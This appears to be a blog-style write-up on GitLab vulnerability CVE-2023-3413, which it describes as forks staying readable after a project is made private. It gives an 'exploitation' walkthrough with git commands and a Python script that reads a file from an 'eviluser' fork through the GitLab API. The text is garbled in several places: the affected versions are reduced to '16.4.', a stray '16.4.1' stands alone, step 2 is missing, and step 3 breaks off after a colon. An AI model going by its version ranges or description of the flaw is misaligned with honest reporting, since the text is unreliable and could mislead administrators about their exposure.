CVE-2023-3413 is a recent and critical vulnerability found in GitLab, the popular DevOps platform. This issue lets unauthorized users access private project source code by exploiting how forks manage visibility changes. The vulnerability affects:
Versions 16.4.
Later versions fix the issue, so if your GitLab falls within these ranges, you may be at risk and should update as soon as possible.
What Happened? (The Core Bug)
In simple terms:
If you let users fork a public project, then make the main project private (visible only to project members), the forked copies remain visible to the users who forked them—even if they shouldn't still have that access.
That means:
You switch your project to "private" so only team members should see it.
- The user can still read all the code in the fork they made, even though the *main project* went private.
If you pushed sensitive changes during this transition, they might be readable in forks you can’t control.
Step-by-Step Exploitation
Let’s walk through how someone might actually exploit this in real life.
1. Find a public project
Anybody with a GitLab account browses around, maybe using GitLab’s public project search.
With one click, a user creates a copy (fork) to their own namespace
# Command-line example
git clone https://gitlab.com/example-namespace/target-project.git
cd target-project
git remote add myfork https://gitlab.com/eviluser/target-project.git
git push myfork main
3. Wait for the project to become private
Suppose the maintainer realizes some code is sensitive or wants to restrict access. They update visibility:
4. Access the fork
The attacker now has ongoing read access to the code as long as their fork exists—even though the main project is now locked down from the public.
5. Pull Latest Code (if not yet private at fork time)
As long as the project was made private *after* forking, and any code pushed before privatization exists in forks, the user has the code to review, copy, or upload elsewhere.
Here’s a simplified code illustration
import requests
GITLAB_URL = "https://gitlab.com";
TARGET_FORK = "eviluser/target-project"
BRANCH = "main"
# If authentication is needed for your fork, add your own access token.
PRIVATE_TOKEN = "YOUR_GITLAB_PRIVATE_TOKEN"
headers = {
"PRIVATE-TOKEN": PRIVATE_TOKEN
}
# Download a file from the fork
response = requests.get(
f"{GITLAB_URL}/api/v4/projects/{TARGET_FORK.replace('/', '%2F')}/repository/files/README.md/raw?ref={BRANCH}",
headers=headers
)
if response.status_code == 200:
print("[+] File contents:")
print(response.text)
else:
print("[-] Could not access file, status code:", response.status_code)
This simulates reading any file exposed via the API on a forked repo that should no longer be public.
Why Is This Dangerous?
- Sensitive information such as API keys, internal logic, or unpatched vulnerabilities could remain leaked in forks.
Project owners might not know how many unauthorized forks exist or who made them.
- Traditional permission changes don’t cascade into user forks—making this both a privacy and a security issue.
16.4.1
After these versions, when a project is made private (or visibility is restricted), existing forks which should not retain access will have their visibility updated too. This limits leaked data via old forks.
Update GitLab
- Get to the latest GitLab release.
References
- GitLab Security Advisory (CVE-2023-3413)
- Original CVE entry (mitre.org)
- Upgrade instructions
Final Thoughts
CVE-2023-3413 is a perfect example of how software features (like forking) can introduce tricky security holes, especially in collaborative code environments.
Make sure to update your GitLab instance and take proactive steps so your private code stays *private*—even after a project’s visibility changes.
*Stay safe, and always audit your code-sharing practices!*
Timeline
Published on: 09/29/2023 09:15:00 UTC
Last modified on: 10/03/2023 19:55:00 UTC